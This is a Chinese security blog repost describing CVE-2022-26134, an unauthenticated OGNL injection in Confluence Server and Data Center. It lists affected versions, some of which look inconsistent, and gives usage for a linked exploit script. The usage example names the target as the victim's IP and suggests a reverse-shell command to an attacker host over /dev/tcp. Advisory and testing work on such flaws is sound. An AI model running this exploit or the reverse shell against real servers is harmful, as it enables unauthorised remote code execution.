Confluence未经身份验证的情况下,可构造OGNL表达式进行注入

admin 2022年7月24日11:55:36评论22 views字数 1017阅读3分23秒阅读模式

远程攻击者在Confluence未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码

影响版本

  • Confluence Server and Data Center >= 1.3.0
  • 7.14.0 <= Confluence Server and Data Center < 7.4.17
  • 7.13.0 <= Confluence Server and Data Center < 7.13.7
  • 7.14.0 <= Confluence Server and Data Center < 7.14.3
  • 7.15.0 <= Confluence Server and Data Center < 7.15.2
  • 7.16.0 <= Confluence Server and Data Center < 7.16.4
  • 7.17.0 <= Confluence Server and Data Center < 7.17.4
  • 7.18.0 <= Confluence Server and Data Center < 7.18.1

使用说明

pip3 install requests
	   ______     _______     ____   ___ ____  ____      ____   __   _ _____ _  _   
  / ___\ \   / | ____|   |___ \ / _ |___ \|___ \    |___ \ / /_ / |___ /| || |  
 | |    \ \ / /|  _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_ 
 | |___  \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__   _|
  \____|  \_/  |_____|   |_____|\___|_____|_____|   |_____|\___/|_|____/   |_|  
    
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND

CVE-2022-26134

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标URL
  -c COMMAND, --command COMMAND
                        执行命令,eg:bash -i >& /dev/tcp/{your ip}/{port} 0>&1

使用

python3 CVE-2022-26134.py -t [受害者ip] -c [command] //执行命令

项目地址

https://github.com/keven1z/CVE-2022-26134

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月24日11:55:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Confluence未经身份验证的情况下,可构造OGNL表达式进行注入https://cn-sec.com/archives/1196704.html

发表评论

匿名网友 填写信息